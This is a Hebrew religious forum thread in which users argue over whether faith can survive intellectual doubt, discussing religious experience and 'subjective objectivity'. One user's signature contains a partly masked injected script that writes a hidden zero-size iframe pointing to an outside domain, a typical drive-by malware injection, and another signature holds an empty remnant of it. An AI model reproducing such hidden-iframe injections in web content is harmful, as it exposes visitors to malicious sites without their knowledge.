בית פורומים עצור כאן חושבים

עצכ"ח - לא הרסתם את חיי. בניתם אותם.

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-7/5/2014 22:22 לינק ישיר 

oפקן כתב:
אולי תגלי לנו רז זה, איך אחרי שאלות ללא תשובות אפשר להישאר מאמינים ושומרי מצוות, איך ספקנות ואמונה דרים בכפיפה אחת ?את מוזמנת להיות גם את עצכחי"ת, ולהשתתף בדיונים. 

אל דאגה, לא אבוא בטענות לאף אחד. אני יודעת כבר עכשו קטעים נרחבים מביקורת המקרא-ארכיאולוגיה-גיאולוגיה-תיאולוגיה-פילוסופיה וכו', ועם זאת, כמו שכתבתי, נותרת מאמינה. 
ביקשת הסבר, איך עושים את זה. 
התקשיתי לנסח, אך קיבלתי מסר בתיבה הפרטית מניק החפץ בעילום שמו (הוא טען שאינו רוצה לכתוב כאן את תשובתו, כי ממילא החברים לא יבינו. אמרתי לו שמספיק שנעזור למישהו אחד בעולם, וכבר זה שווה. אולי מישהו אחד מתלבט ישמע שיש אנשים כמונו, שלמדו ויודעים בשכלם את הספקות, אך מצליחים לערוך הפרדה ברורה בין השכל לרגש ולהתנהגות). 
ואלו דבריו:
ההגדרה שלך בהמשך האשכול בתשובה לשאלה של מישהו, איך אפשר להאמין ולקיים אם יש שאלות וספקות.. זו התשובה שלי ג"כ כיום.
אני, וגם ראיתי עוד מישהו שאומר כך, הוא הימור פסקל אבל לא על שכר ועונש אלא על משמעות.
בנוסף, החוויה הדתית שלי, שעברתי וחויתי, אמיתית לגמרי בעיני. ושוב, יטען הטוען שאולי הכל כימיקאלים וחשמל במוח, ולא עדות על אמת כלשהי. ואני עונה "מה אכפת לי". בחוויה שלי זה אמיתי וזה מספיק לי בכדי לחיות כך את חיי בזה העולם שבין כה וכה אינם אלא חוויית חיים אחת מתמשכת.
אני קורא לזה "אובייקטיביות סובייקטיבית". תחושה סובייקטיבית שזה אובייקטיבי. שיש, שזו אמת. אין לי על זה הוכחה חיצונית בלתי ניתנת להפרכה, אבל אני חווה את הדברים כאמיתיים, בחוויות דתיות, ובקוהרנטיות מדהימה בעומקי מחשבת היהדות, שזה חלק התורה שאני הכי מתחבר אליו. אני מאמין שהבורא לא ידון אותי לכף חובה אם זה אכן מה שהחזיק אותי, גם אם בגלל זה אני אשגה פה ושם, או אם הוא התכוון ליותר מזה.

דדווח על תוכן פוגעני

נשלח ב-7/5/2014 22:44 לינק ישיר 

למינגית

אולי תכתבי לו שיכתוב גם לי.

לגבי החויה הדתית, דומה שזה בדיוק מה שאני מנסה לכתוב באשכולות רבים, והדברים נמצאים, לדעתי, אצל הגרי"ד סולוביצ'יק ואצל ר' נחמן (הפניתי הקבועה: מעשה בחכם ותם ופרשנותו של הרב שטינזלץ בספרו "ששה סיפורי מעשיות" שיצא מחדש לאור).

אשר לטענתו הראשונה, אולי היה מקום להציע דרך שונה במקצת. לא "הימור" אלא "קפיצה" של אמונה. וצריך להרחיב. אשתדל בל"נ.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-7/5/2014 23:16 לינק ישיר 

היות והניק המסתורי סבור ש״ממילא החברים לא יבינו״, האם יש עוד מקום לדיון ? בכלל לאחרונה יש לנו הרבה מסתוריות בפורום, רב מסתורי מהדרום, עכשיו ניק מסתורי, ואנה אנו באים.

דדווח על תוכן פוגעני

נשלח ב-7/5/2014 23:44 לינק ישיר 

אמר הניק המסתורי בהודעה נוספת באישי:
לא אמרתי שלא יבינו

אמרתי א. שלא יקבלו , ב. שבאמת לא יהיה שום דיון פורה ומועיל, אלא התבצרות של כל אחד בעמדותיו המגובשות כבר עד לעייפה.

זה מה שאמרתי: "לא מעוניין להגיב שם. אלה לא חבר'ה שמקבלים משהו. הכל כבר מגובש להם, ובטרחנות יבשושית יעקרו את כל העניין. ויש כמה שעוד ישתמשו בזה כקשר קפיצה להגיגיהם. ובעיקר, למה לי, ולמה לך. את יודעת את זה, אני יודע את זה. די לי בכך. לא זקוק לאישור של חברי עצכח. ואם משום דיון - הוא אשר אמרתי שלא יתפתח שם דיון פורה כרצוני, וגם אני אחרי בירורים רבים עם עצמי גיבשתי עמדה יציבה זו, אז חבל/מיותר לכל הצדדים".

ואת יכולה לצטט את זה, שוב בעילום שמי.

דדווח על תוכן פוגעני

נשלח ב-7/5/2014 23:49 לינק ישיר 

אבל לכתוב בעצכ"ח זה לא רק דיון
זה גם (ובשבילי בעיקר) לכתוב עבור אלה שקוראים על מנת להחכים,
הם בודאי לא מתבצרים בעמדותיהם, ולעיתים אין להם כאלה בכלל.

??

דדווח על תוכן פוגעני

נשלח ב-7/5/2014 23:58 לינק ישיר 

לאמר כתב:
אבל לכתוב בעצכ"ח זה לא רק דיון
זה גם (ובשבילי בעיקר) לכתוב עבור אלה שקוראים על מנת להחכים,
הם בודאי לא מתבצרים בעמדותיהם, ולעיתים אין להם כאלה בכלל.

??

זה עיקר טענתי כל הזמן שהגולשים עיקר שאפי' לפעמים הדיון נתקע וכדומה לפחות יש מה ללמוד.

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 12:47 לינק ישיר 

"אני קורא לזה "אובייקטיביות סובייקטיבית". תחושה סובייקטיבית שזה אובייקטיבי. שיש, שזו אמת. אין לי על זה הוכחה חיצונית בלתי ניתנת להפרכה, אבל אני חווה את הדברים כאמיתיים, בחוויות דתיות, ובקוהרנטיות מדהימה בעומקי מחשבת היהדות, שזה חלק התורה שאני הכי מתחבר אליו. אני מאמין שהבורא לא ידון אותי לכף חובה אם זה אכן מה שהחזיק אותי, גם אם בגלל זה אני אשגה פה ושם, או אם הוא התכוון ליותר מזה."

כאן עוצרים לחשוב ולא לחוות תחושות ילדותיות של אובייקטיביות סוביקטיבית או כפור חם.

אם כי,יש להודות בצער, שהיום צריך לשנות את שם הפורום לעצור כאן חווים או עצור כאן חשים כי כל החושבים שהיו פה פעם נעלמו כולם.ולא בכדי.

תוקן על ידי אפריםבן ב- 08/05/2014 12:57:39

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 13:48 לינק ישיר 

לאפריםבן, 
האם חשיבה, לדעתך, אמורה להוביל רק לכפירה?
הרי לו הייתי מצהירה כאן שאני אנוסה בסתר כי הגעתי למסקנה שהתורה לא אמת וכו', אז הייתי זוכה ממך לתשואות חן חן על מחשבותי העמוקות. 
אבל המחשבות לא הובילו אותנו לאניסות. לא. אני ועוד אנשים, חשבנו הרבה והתעמקנו הרבה והחלטנו שכך טוב לנו יותר לחיות, כמאמינים, אחרי כל המחשבות. האם זה הופך את תחושותינו לילדותיות? למה? כי לא הגענו למסקנה שלך? 
כן, אנחנו חושבים. אני חושבת. הניק המסתורי חושב. לא רק מחשבותיך נקראות 'חשיבה', אלא גם מחשבותינו, למרות שהן שונות משלך. 

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 14:09 לינק ישיר 

הבנת הנקרא זה הא"ב

איפה כתבתי שחשיבה מביאה בהכרח לכפירה?

כתבתי שכפור חם היא תופעה שלא קיימת ולכן גם "אובייקטיביות סובייקטיבית" לא תיתכן במציאות.
זה הכל.

ואם הניק המיסתורי רוצה לפרט את מחשבותיו והוכחותיו ולא  רק את תחושות ה"טוב לי" "כיף לי" אולי הוא היה ממשיך את מסורת החשיבה שהיתה כאן בראשית הפורום שנעלמה ואיננה (אקדמאי,מציץ ונפגע,ווטו,יהוסף שנעלמו ואינם שאותם כדאי לקרוא גם עכשו אם רוצים לחשוב ולא לשמוע חוויות "אובייקטיביות סובייקטיביות")

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 16:15 לינק ישיר 

אפריםבן כתב:
" כי כל החושבים שהיו פה פעם נעלמו כולם.ולא בכדי.

תפסיקו עם הבכיינות הזאת. אם היו פעם חושבים אז מה הבעיה שלך לומר ולצטט את דבריהם החושביים הגדולים שלהם ?
אם היו אקדמאי, אולי תן לנו משהו יצירתי מקורי אפי' לא משהו פרגמטי רק כזה גאונות קטנה, בסדר ?? אנא אנא !!!

במשפט "עצור כאן חושבים" יש גם את המילה "כאן" שזה אומר כאן ועכשיו עוצרים וחושבים ולא מתבכיינים על פעם.
במיוחד שכל מה שנכתב על ידי העבר קיים בפורום. במילא אפשר כאן ועכשיו לצטט את גאוני העבר. או דווקא ללמוד מהם אייך לדון ואייך לטעון ולהשתמש עם זה כאן ועכשיו.

אתה מזכיר את המשגיחים בישיבות. פעם היו מתמידים גדולים פעם בחור בן 15 ידע את כל הש"ס פעם היו גאונים פעם ופעם ופעם ופעם.
מתוך ניסיוני בחיים הקצרים שלי אני יודע דבר אחד. שכל מי שאין לו מה למכור אז מוכר אוויר = פעם בעבר וכו' וכו'

דווקא בתורה ובהגות ובחשיבה, הכל מונח לפנינו ואפשר לראות מה היה או לא היה. דברי חכמה דברי ביקורת דברי תבונה דברי הגיון וכו' וכו' רלוונטיים כל הזמן והם חקוקים באלפי האשכולות כאן. מצאת משהו מועיל או חכמה או גאונות ?! אז פדל !!!

לסיכום: דברי חכמה הם סימטרי בזמן. ולכן כל הבכיינות הם לא במקומם.

תוקן על ידי maxmen ב- 08/05/2014 16:17:42

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 16:34 לינק ישיר 

דווקא בזה אני מסכימה עם אפריםבן. לדיונים הישנים יש טעם מיוחד, שאין היום.
ולדעתי זה לא רק כי נעלמו החושבים, אלא גם בגלל שגמרו כבר לדון על כל או רוב הנושאים המעניינים, ולכן עברו למשעממים. 
אגב, בלי קשר לכאן, אשכול ששינה לי לגמרי את הראש, הוא זה. (הסיפור עם בעל התניא ושעון השמש)

http://www.bhol.co.il/forums/topic.asp?whichpage=2&topic_id=2931344&forum_id=1364
יש שם הפרכה פשוטה כל כך לסיפור שליווה אותי מילדות. ישבתי אז מול המחשב וצחקתי בטירוף. על עצמי, על אמונותי התפלות, על כך שאפשר למכור לי כל שטות במסווה של סיפור צדיקים. על כך שעם כל הידע שלי בגיאומטריה, נזקקתי לחבורת עצכחניקים שיוכיחו לי כזה דבר פשוט. 

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 17:18 לינק ישיר 

oפקן כתב:

...אל חשש, השועלים של היום יהיו הכותבים האגדיים של מחר.

[ספקן - 
כך מוכיחה ההיסטוריה (אפילו זו הקצרה של הפורום הזה)...]

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 17:23 לינק ישיר 

א"כ אולי כדאי שאעלם.

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 17:36 לינק ישיר 

אפרים, שאבין, אתה מניח מראש שרק חשיבה קרה היא הדבר, וכל השאר לא קיים או ילדותי? 

בעצם אתה טוען ששם הפורום מוכיח שמייסדיו אחזו כך. והוציאו מהמערכת מראש כל מה שאינו חשיבה, [כולל חשיבה שתסיק לאחר מחשבה שיש להכניס למערכת גם מה שאינו בהכרח חשיבה]. ואת זה עשו מיד עם ייסוד הפורום עוד לפני שביררו נקודה זו עצמה בדיוניהם. מעניין. זה נראה לך אובייקטיבי גישה כזו? זה לא מעגלי?

וכמו שאמרה לך למינגית, ואומר במילותיי שלי: עוד לא ראיתי פה חשיבה כלשהי שהצליחה לבסס את הדת כולה על חשיבה. לכל היותר זה הסתיים בסבירויות, בנוסחאות שהוציאו מהדת המקובלת כל מיני דברים, כמובן בטענות שזה טעויות שהשתרשו וכו'. כלומר את הדת כמות שהיא מקובלת לא גיבה פה איש בחשיבה. לא כי לא ניסו אלא כי לא הצליחו.

שלא אובן לא נכון. לא אמרתי שהדת המקובלת יצוקה בסלע. מה שאני אומר זה כך: האנשים פה מראש קבעו מהו הכלי שיברר להם, וכל מה שלא נכנס לתוך הכלי הזה - עף מראש. אז יפה לכם, הוכחתם דבר אחד, שהדת אינה דבר שניתן להוכחה וביסוס כל כולה על שכל. בסוף מגיע מה שנקרא.. כן.. אותו הדבר שכתוב בתורה מראש, ושיהודי כל דור ודור גדלו עליו: אמונה. או בחירה ערכית, או נטיית הלב, או נטיית השכל לפי איזו סבירות, כל אחד קורא לזה אחרת.

אחרי כל החשיבה הגעתם למסקנה שצדקו אותם יהודים עתיקים ופרימיטיביים שביססו את יסוד דתם על אמונה. כי לבסס דבר שאינו נתפס בחושים כלל, על לוגיקה לבדה - בלתי אפשרי. מהסיבה הפשוטה שאינך יודע את הדבר, אז אפשר להניח כל דבר בכדי להפריך את הלוגיקה, ואין לך מה שיברר כן או לא. אין למה להשוות. לוגית נטו - הכל ייתכן.

למשל: קראתי פה המון את הרב מיכי ועד היום לא ברור לי על מה הוא מבסס את קדושת כתבי הקודש והגמרא. למה הוא מציית לחוקי התורה. מילא על בריאת העולם יש לו נוסחה, אוקי, יש בורא. אבל מה הלאה, מה אותו בורא רוצה, האם הוא רוצה, האם תקשר אי פעם עם בני האדם, האם באמת כ"כ אכפת לו עד כדי נטילת חיים מי שלא אכל כזית בשר צלוי בלילה מסויים בשנה, או הדליק אור בשבת במתג חשמלי? או גירד עצמו עד זוב דם? וכו' וכו'. יש הוכחה לוגית או אונטולוגית לכל זה? אחרי כל החשיבה העצומה שהובילה למסקנה - על פי סבירות, לא מוצקה וודאית - שיש בורא לעולם. אוקי, אז יש בורא. אבל למה אנחנו יהודים? למה הוא שומר יהדות, תורה ומצוות? מנין ההבדל בין אדם לאדם, שאנחנו יהודים וההוא גוי? האם בכלל להאמין בבורא הוא ערך? הוא מצוה? האם בכלל אותו בורא ציווה משהו? יש למישהו הוכחה לוגית או מציאותית על זה - כזו שיכולה להסתמך על חשיבה בלבד?

ואם נניח על מתן תורה יש, נניח שהתנ"ך איכשהו עובר את שאלתי זו בתשובה חיובית, רק נניח. מה לגבי הגמרא. על זה ודאי לא פגשתי פה תשובה לוגית או ודאית בצורה כלשהי, על סמכות חכמי הגמרא לפרש או לקבוע את רצון האל. לכל היותר דיבורים על "קאנוניזציה" כלומר תהליך חברתי ש"קידש" [לא מבין את המילה בהקשר הזה] את הטקסטים האלה, וכבל דורות ע"ג דורות של אנשים לחוקים האלה, ולהסתעפויותיהם, ועד כדי שחברה זו הורגת אנשים שלא מצייתיםפ למה שכתוב בקאנון שלה. זו דת? זה רצון האל? או שפה זה כבר סתם חברה שהורגת על השטויות שהיא החליטה לקדש? יש למישהו פה תשובה לוגית על זה?

מה לגבי לייבוביץ'? ה"בחירה הערכית" שלו, קבלת העול של מי שאין לשאול וממילא אין להוכיח שישנו בכלל - היא לוגית בעיניך? גם הוא לא היה מתקבל לפורום הנכבד דנן?

ומה יש לך לומר למיימוני, שאינו חשוד על אי השתייכות לאושיות הפורום, ותמך לעיל בגישה שהוצגה, ואמר שזה מה שהוא מנסה לומר באשכולות רבים? גם הוא לא מתאים לפורום, מעניין איך לא עלית על זה עד עכשיו והעמדת אותו במקומו על כך. 

בקיצור: מה שאני טוען הוא שאין להניח מראש שרק השכל הוא הכל. כבני אדם איננו רובוטים חושבים, יש לנו למשל מודעות, הכרה. זו אינה חשיבה. ההכרה שלי שאני קיים למשל, אינה חשיבה, ואכן ערערו עליה החושבים, אבל לא משום כך אינה קיימת. ובעיני שוטה הוא המניח מראש שרק חשיבה היא קיימת, ובא מכוחה לערער על הכרת עצם מציאותו, בזמן שמה יתרון לשכל על הכרה זו אם שניהם קיימים אצלו. כמו כן יש לנו רגש, יש אינטואיציה, ואני בהחלט יכול להניח שכשבורא עולם - אם הוא קיים כמובן - תכנן שיאמינו בו וכו' הוא לקח בחשבון את כל מה שברא באדם, שאולי אפילו לשם כך ברא, כדי שהמערכת המורכבת ששמה אדם, על כל אשר בה - תכיר בו.

ואז בא האדם הנ"ל, החליט שמתוך כל חלקיו רק השכל הוא נאמן, ומנסה להכיר בבורא ובתורתו רק עם חלק אחד ממנו, ונכשל, ואז הוא מסיק שאין תורה ואין בורא, ומוכיח את זה בצורה מעגלית מזה שהשכל לא מסוגל להוכיח את זה..

לאמור, אין לדעתי מנוס מלערב את שאר החלקים. לא ראיתי שמישהו הצליח שכלית בלבד לייסד דת איתנה, ודאית, כולל תורה וחוקים וסמכות. דת שאינה כרוכה כלל באמונה,/בחירה ערכית/הסתברות/קאנוניזציה/סוציולוגיה. לכל היותר עשה משהו מעגלי: קבע מראש את השכל ככלי, וכל מה שלא נכנס לשכל עף החוצה והוגדר שאינו דת אמיתית. דרך זו הובילה את רוב רובם של הולכיה לכפירה. ועוד בתחושה של צדק, שהרי הנה, בדקנו, וזה מה שעלה ביד שכלנו.

קל להטיל ספק, ובלתי אפשרי להוכיח ודאית, גם לא לוגית, דברים שאינם נתפסים בחושים, [והאמת, גם מה שכן נתפס..]. באמת צריך עשר שנים של הפורום הזה כדי לדעת את זה? 

אפילו על המציאות עצמה ניתן לערער, וכבר עשו זאת. איזו תשובה ודאית יש על זה? הכל הולך בסוף אל הכרה, מודעות, אל ה"לא אכפת לי" שהוזכר לעיל. לאמור: מה בכך אם לוגית ניתן לטעון שאיני קיים אלא אני חלום של פרפר. תכל'ס כאן אני, חי וחווה וחושב, ודי לי בכך. בתוך מערכת זו שהיא כל קיומי, אעשה ואפעל ואחשוב וארגיש. ואם היא לא אמיתית אלא חלום, יהי כך. בין כה וכה כל קיומי הוא במסגרת החלום אז במסגרתו גם אחיה חיים מלאים. עדי יקיץ אותו פרפר.

ואם על עצם המציאות והחיים כך, כל שכן על פרטי הבחירות שלי בחיים האלה. לוגיקה לבד יכולה לפקפק על הכל. אבל בסופו של דבר אני הרי חי, נכון? כן לוגית לא לוגית אבל אני פה, חושב, מרגיש, קיים. לפחות בתחושתי זה ככה. אז במסגרת אותו קיום תחושתי ומשמעותי, אני בוחר ג"כ, בחירות שתואמות לאותה מסגרת לא לוגית בה הן מתקיימות. מבסס אורח חיים על שילוב של מערכת שמכילה לוגיקה לצד תחושה לצד מודעות לצד סבירות לצד הכרעות ערכיות, כשבסופו של דבר אני פשוט מבסס לי מה שנותן לי את המשמעות הכי גדולה לחיי, שכאמור, גם הם עצמם בדיוק כאלה. לא לוגיים.

מה שבאתי לומר בכל המלל הזה הוא: בהחלט זו מסקנה שכלית, שלי לפחות, שהשכל לבדו אין די בו. שכלי מסיק שיש להסתמך על בחירות ערכיות ג"כ, על בחירה במשמעות כדרך חיים ג"כ, בחירה, לא הוכחה. שיש להסתמך על תחושות ג"כ. יש תחושות ילדותיות ויש תחושות שאינן כאלה, אלא עמוקות מאד, תחושה של מה שנותן לי משמעות לחיי, מה שאני באמת מרגיש בו טוב, טוב ממש. איזו לוגיקה יכולה לפקפק על זה? איזון לוגיקה יכולה להציע לי תחליף שהיא יכולה להוכיח שהוא יותר אמיתי מזה? יותר "טוב" מזה. [כשתסיימו את הדיונים הלוגיים האם יש בכלל מוסר וערכים ו"טוב" ו"נכון", כזה שאינו סוציולוגי תרבותי, אלא לוגי, מוכח, ודאי, כזה שלא ניתן להטיל בו ספק - תודיעו לי. אני כבר מעכשיו יודע שיהיה לי שקט מכם לנצח].

תוקן על ידי נתנאל34 ב- 08/05/2014 17:39:46

דדווח על תוכן פוגעני

נשלח ב-8/5/2014 17:42 לינק ישיר 

אפרים בן

כתגובה למי שהסתמך על חוית מפגש עם אלוקים (ויש לבאר למה הכוונה), כתבת

כאן עוצרים לחשוב ולא לחוות תחושות ילדותיות של אובייקטיביות סוביקטיבית או כפור חם

הרשה לי להעיר על כמה מהדברים שכתבת ולהציג עמדה שונה.

1. השתמשת בביטוי "תחושות ילדותיות".

אני משער שכוונתך שיש בני אדם שמסתמכים על תחושות באופן ילדותי, לא ביקורתי, ולכן הם טועים.

כמדומה שלמינגית והכותב המסתורי שלה, ר' נחמן מברסלב והרב שטיינזלץ, והגרי"ד סולוביצ'יק (וכמדומה גם מיכי באשכול ענק על השגחה פרטית, ואולי עוד אחרים שם) הציעו להסתמך על תחושה - ולא עשו זאת בצורה ילדותית, כלומר לא מודעת לעצמה ולא מבקרת ולא מנסה להכיר את הנחות היסוד של עצמה.

שים לב כי איני טוען בשלב זה שהתיאור נכון, שאין כאן הונאה עצמית, שאי אפשר לסמוך בכלל על תחושות ועוד. אני רק טוען שאין הטיעון הזה ילדותי. (כפי שבדרך כלל משתמשים במונח זה בהקשר כזה).

2. השתמשת במונח "כפור חם".

אני משער שכוונתך היתה להצביע על כך שהיומרה של הכותב היתה להשתמש באוקסימורון (מונח שיש בו סתירה פנימית) או, טוב מזה, להצביע על כך שהטענה של הכותב מכילה סתירה פנימית. איך הוא יכול להעניק מעמד אובייקטיבי, ודאי, למה שאינו אלא תחושה, ועוד תחושה שאי אפשר להעביר לאחרים? רק לספר עליה?

שוב, הבה נבדוק יחד אם יש כאן באמת סתירה. האם לא יכולה להיות לאדם תחושה חזקה  (כמדומה שאפשר לדרג תחושות לפי עוצמתן ולפי המידה בה אנו מאמינים שהן משקפות מציאות)? כמובן, המקשיב מבחוץ בוודאי יאמר לעצמו: זה מה שהוא אומר. ואין צורך אפילו לטעון שהדובר ילדותי כדי לסבור שהוא טועה. מספיק להניח שהוא טועה אפילו, נניח, בהמשגה שהתחושה מובילה אליה, בתיאוריה שהתחושה משתבצת בתוכה.

ואכן זו הבעיה הגדולה של תחושות, כפי שיבואר בסעיף הבא.

3. אם אקח תחושה הרבה יותר יומיומית, כאשר אדם סובל מכאב שינים, אין מי שיכול לחלוק עליו. ניתן לסבול אפילו מכאב רפאים באיבר שנכרת (לפי המדווח במקורות רפואיים). תחושה היא דבר שאי אפשר לערער עליו. אפשר לערער על הפרשנות למציאות שאחראית לתחושה. אבל התחושה נמצאת בעולם פרטי של כל אחד מאיתנו, של החווה.

כמובן, בתיאור התחושה אנו נעזרים במושגים הלקוחים מן המציאות "שבחוץ", זו שאמורה להיות מוכרת לכולנו, זו שאנו אמורים לגור בה. לדוגמא, אם אני טוען שכואבת לי האצבע ברגל לאחר שנחבטתי ברגל העץ של הכורסה, הכאב הוא בלתי ניתן לערעור (אלא אם כן נניח שאני משקר - כי אכן המצאתי את הדוגמא הזו...), אבל ניתן לטעון שאולי אין כורסה ואין רגל עץ, ואני טועה בפרשנות. כי הייחוס של סיבה מסויימת, חיצונית, לתחושה הוא סוג של פרשנות, כפי שעולה מאותו תחום מחקר מרתק שנקרא "הרמנויטיקה" (כפי שאני מבין אותו).

לפיכך, מי שטוען "יש לי חוית אלוקים", איך אפשר להתווכח איתו? עם הודאות שהוא חש? אפשר ואפשר להתווכח על המשמעות שהוא מייחס לאותה חויה. על הקוטב של המוחש, כלומר אלוקים. אפשר לערער באופנים שונים ולא אעשה זאת כעת. אבל, שוב, אין זה אומר שהנסיון לספר על חוויתי הודאית אומר שאני באופן הכרחי שקרן וטועה.

נכון, מי שיספר לי שחוה מפגש עם זאוס היווני/יש"ו הנוצרי/נשמתו של האר"י ייראה לי כטועה. וזה על סמך אמונותי שלי (שאני רואה בהן ידיעות).

אבל זה לא אומר שהטוען כן אינו יכול להגן על דעותיו מבחינה פילוסופית. דוגמאות מצויינות לכך נמצא גם במאמרי הרב סולוביצ'יק מסוג זה וגם בניתוחו של הרב שטיינזלץ למעשה בחכם ותם, שכבר המלצתי עליו.

4. על סמך הנאמר בסוף הסעיף הקודם, מתברר שהאוקיסמורון "אובייקטיביות סובייקטיבית" אינו סתירה אלא פשוט צריך לדייק באופן שבו משמשות המילים. הכוונה היא לתחושה, שהיא תמיד סובייקטיבית, ולוודאות שלי לגבי משמעותה, כי המשמעות שמתגלה לי דרך התחושה, האופן שבו אני מפרש את התחושה (התחברות עם אלוקים, גילוי של השגחתו, אהבתו, הקשבתו לתפילתי, וכיו"ב), הם בעיני נכונים ללא ספק. כמובן, לאחרים אני יכול רק לספר עליהם.

בניגוד לכותב האלמוני לתיבתה של למינגית (המוזמן לכתוב גם אלי), אני סבור שיש ויש טעם לספר על חויות אלו. זו היתה דרכו של הרב סולוביצ'יק, כך עשה ר' נחמן וכך עשה מפרשו. הסיפור מהוה הזדמנות לקורא לבדוק את עצמו, אולי בעצם גם הוא מכיר את החויה הזו.

כמובן, בתור מי שסבור שזו טעות, בין טעות בכתובת (כי אין אלוקים או לפחות לא כזה המתגלה לפלוני באופן כזה) ובין בניתוח הפילוסופי, אני סבור שעליך לייצג את עמדתך בצורה המיטבית עבור כולנו. הרי תרצה להצילנו מטעויות כאלו. אשמח, בל"נ, לקרוא את המשך ביקורותיך. אבל לפחות נדייק במונחים ולא נייחס זה לזה דעות ועמדות שטחיות כאשר הן אמורות להיות פילוסופיות.

___נמחקה מילה שהוקלדה בטעות מביכה______________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 08/05/2014 17:42:02

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > עצכ"ח - לא הרסתם את חיי. בניתם אותם.
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 7 8 לדף הבא סך הכל 8 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.